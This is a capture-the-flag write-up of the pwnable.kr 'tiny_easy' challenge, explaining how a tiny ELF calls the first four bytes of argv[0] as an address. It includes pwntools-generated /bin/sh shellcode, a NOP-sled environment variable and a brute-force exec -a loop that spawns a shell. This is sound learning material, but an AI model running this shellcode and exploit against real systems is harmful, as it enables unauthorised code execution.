pwnable.kr tiny_easy writeup

0x01 Check security

$ checksec tiny_easy
[*] '/home/ubuntu/pwn/tiny_easy/tiny_easy'
Arch: i386-32-little
RELRO: No RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)

NX is disabled, so code placed on the stack (for example in an environment variable) is executable.

0x02 Disassemble

08048054 pop eax
08048055 pop edx
08048056 mov edx, [edx]
08048058 call edx

…?
What a tiny ELF..

0x03 Debug

(gdb) b *0x08048056
Breakpoint 1 at 0x8048056
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/ubuntu/pwn/tiny_easy/tiny_easy

Breakpoint 2, 0x08048056 in ?? ()
(gdb) info r
eax 0x1 1
ecx 0x0 0
edx 0xffff8943 -30397
ebx 0x0 0
esp 0xffff8818 0xffff8818
ebp 0x0 0x0
esi 0x0 0
edi 0x0 0
eip 0x8048056 0x8048056
eflags 0x202 [ IF ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x0 0
(gdb) x/7s $edx
0xffff8943: "/home/ubuntu/pwn/tiny_easy/tiny_easy"
0xffff8968: "SHELL=/bin/bash"
0xffff8978: "WSL_DISTRO_NAME=Ubuntu-20.04"
0xffff8995: "NAME=DESKTOP-TR6SWQE"
0xffff89aa: "PWD=/home/ubuntu/pwn/tiny_easy"
0xffff89c9: "LOGNAME=ubuntu"
0xffff89d8: "_=/usr/bin/gdb"
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x6d6f682f in ?? ()

Obviously, tiny_easy pops argc into eax and the argv[0] pointer into edx, loads the first four bytes of argv[0] ("/hom") into edx, and `call edx` then makes the program jump to address 0x6d6f682f ("/hom" read as a little-endian integer), which triggers a segmentation fault.

$ exec --help
exec: exec [-cl] [-a name] [command [arguments ...]] [redirection ...]
Replace the shell with the given command.

Execute COMMAND, replacing this shell with the specified program.
ARGUMENTS become the arguments to COMMAND. If COMMAND is not specified,
any redirections take effect in the current shell.

Options:
-a name pass NAME as the zeroth argument to COMMAND
-c execute COMMAND with an empty environment
-l place a dash in the zeroth argument to COMMAND

If the command cannot be executed, a non-interactive shell exits, unless
the shell option `execfail' is set.

Exit Status:
Returns success unless COMMAND is not found or a redirection error occurs.

The exec builtin with the -a option lets us pass an arbitrary argv[0] to COMMAND, which means that we can put shellcode into an environment variable, pass a guessed shellcode address as argv[0], and get a shell by brute force.

But the problem is, how to make a shellcode?

I guess we need pwntools…

$ python3
Python 3.8.10 (default, Jun 2 2021, 10:49:15)
[GCC 9.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from pwn import *
>>> asm(shellcraft.i386.linux.sh())
b'jhh///sh/bin\x89\xe3h\x01\x01\x01\x01\x814$ri\x01\x011\xc9Qj\x04Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80'

And the shellcode address:

[email protected]:~$ export A=$(python -c 'print("jhh///sh/bin\x89\xe3h\x01\x01\x01\x01\x814$ri\x01\x011\xc9Qj\x04Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80")')
[email protected]:~$ gdb ./tiny_easy
(gdb) b *0x8048058
Breakpoint 1 at 0x8048058
(gdb) r
Starting program: /home/tiny_easy/tiny_easy
Breakpoint 1, 0x08048058 in ?? ()
(gdb) info r
eax 0x1 1
ecx 0x0 0
edx 0x6d6f682f 1836017711
ebx 0x0 0
esp 0xffaaac18 0xffaaac18
ebp 0x0 0x0
esi 0x0 0
edi 0x0 0
eip 0x8048058 0x8048058
eflags 0x202 [ IF ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x0 0
k0 0x0 0
k1 0x0 0
k2 0x0 0
k3 0x0 0
k4 0x0 0
k5 0x0 0
k6 0x0 0
k7 0x0 0
(gdb) x/8xw 0xffaaac18
0xffaaac18: 0x00000000 0xffaabd9e 0xffaabdcd 0xffaabde3
0xffaaac28: 0xffaabdf3 0xffaabe07 0xffaabe2b 0xffaabe3f
(gdb) x/16s 0xffaabd9e
0xffaabd9e: "A=jhh///sh/bin\211\343h\001\001\001\001\201\064$ri\001\001\061\311Qj\004Y\001\341Q\211\341\061\322j\vX ̀"
0xffaabdcd: "XDG_SESSION_ID=118569"
0xffaabde3: "SHELL=/bin/bash"
0xffaabdf3: "TERM=xterm-256color"
0xffaabe07: "SSH_CLIENT=112.86.218.22 48280 2222"
0xffaabe2b: "SSH_TTY=/dev/pts/41"
0xffaabe3f: "USER=tiny_easy"
0xffaabe4e: "COLUMNS=120"
0xffaabe5a: "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin"
0xffaabec2: "MAIL=/var/mail/tiny_easy"
0xffaabedb: "_=/usr/bin/gdb"
0xffaabeea: "PWD=/home/tiny_easy"
0xffaabefe: "LANG=en_US.UTF-8"
0xffaabf0f: "LINES=30"
0xffaabf18: "HOME=/home/tiny_easy"
0xffaabf2d: "SHLVL=1"

OK. The "A=" string starts at 0xffaabd9e, so the shellcode itself starts two bytes later: use 0xffaabda0 as argv[0].
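To make the two address derivations above reproducible (why the first crash lands at 0x6d6f682f, and how the "A=" string address turns into the argv[0] bytes), here is an added helper script that is not part of the original writeup. It models the `pop eax; pop edx; mov edx,[edx]; call edx` sequence and parses gdb `x/Ns` output; the GDB_STRINGS sample is constructed from the session on this page.

```python
import re
import struct

# Constructed sample of the gdb `x/16s` dump from the Debug section (first
# entries only, the A= string truncated); addresses are the ones on this page.
GDB_STRINGS = r'''
0xffaabd9e: "A=jhh///sh/bin\211\343h\001\001\001\001"
0xffaabdcd: "XDG_SESSION_ID=118569"
0xffaabde3: "SHELL=/bin/bash"
0xffaabdf3: "TERM=xterm-256color"
'''


# At process entry the stack holds argc, then argv[0..], so
#   pop eax ; pop edx ; mov edx,[edx] ; call edx
# jumps to the first four bytes of argv[0] read as a little-endian address.
def entry_stack_target(argv0: bytes) -> int:
    """Return the address `call edx` jumps to for a given argv[0] string."""
    # A string shorter than 4 bytes would make the load read past the NUL
    # into whatever follows on the stack; modelled here as zero padding.
    return struct.unpack("<I", argv0[:4].ljust(4, b"\0"))[0]


def describe_target(addr: int) -> str:
    """Show a faulting address as the little-endian bytes that produced it."""
    return struct.pack("<I", addr).decode("latin-1")


def env_value_address(gdb_dump: str, name: str) -> int:
    """Parse `x/Ns` lines and return the address of the value part of
    NAME=value: the string address plus len(NAME) plus one for the '='."""
    for m in re.finditer(r'^(0x[0-9a-f]+):\s+"([^=\"]*)=', gdb_dump, re.M):
        if m.group(2) == name:
            return int(m.group(1), 16) + len(name) + 1
    raise KeyError(f"{name}= not found in dump")


def argv0_for_address(addr: int) -> bytes:
    """The four argv[0] bytes that make `mov edx,[edx]` load ADDR."""
    return struct.pack("<I", addr)


if __name__ == "__main__":
    crash = entry_stack_target(b"/home/ubuntu/pwn/tiny_easy/tiny_easy")
    print(f"argv[0] path -> jump to {crash:#x} ({describe_target(crash)!r})")
    a = env_value_address(GDB_STRINGS, "A")
    print(f"A= value lives at {a:#x}, argv[0] bytes {argv0_for_address(a)!r}")
```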

0x04 EXP

Before brute-forcing, we should pad the front of the shellcode with a NOP sled (\x90) so that `call edx` is far more likely to land somewhere inside it.

export A=$(python -c 'print("\x90" * 30000 + "jhh///sh/bin\x89\xe3h\x01\x01\x01\x01\x814$ri\x01\x011\xc9Qj\x04Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80")'); for i in {1..1000}; do bash -c "exec -a $(python -c 'print("\xa0\xbd\xaa\xff")') ./tiny_easy"; done
Author

lyq1996

Posted on

2021-10-10

Updated on

2021-11-07
